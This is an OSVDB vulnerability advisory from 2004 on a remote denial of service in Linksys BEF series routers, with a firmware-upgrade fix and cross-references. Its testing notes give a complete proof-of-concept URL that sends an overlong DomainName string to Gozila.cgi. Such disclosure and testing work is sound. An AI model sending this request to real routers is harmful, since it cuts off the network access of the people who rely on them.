Linksys BEF Series Routers Gozila.cgi DomainName DoS

2004-06-03T05:27:24
ID OSVDB:6655
Type osvdb
Reporter b0f(b0fnet@yahoo.com)
Modified 2004-06-03T05:27:24

Description

Vulnerability Description

Linksys BEF series routers contains a flaw that may allow a remote denial of service. The issue is triggered when a long string (about 350 chars) is passed to the gozila.cgi script DomainName parameter, resulting in loss of availability for the Linksys router.

Solution Description

Upgrade the router firmware to the most recent release 1.50 or newer, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Linksys BEF series routers contains a flaw that may allow a remote denial of service. The issue is triggered when a long string (about 350 chars) is passed to the gozila.cgi script DomainName parameter, resulting in loss of availability for the Linksys router.

Manual Testing Notes

http://[victim]/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1

References:

Vendor Specific Solution URL: http://www.linksys.com/download/firmware.asp?fwid=3 Snort Signature ID: 2225 Secunia Advisory ID:11764 Related OSVDB ID: 6656 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0033.html ISS X-Force ID: 16305 Bugtraq ID: 10453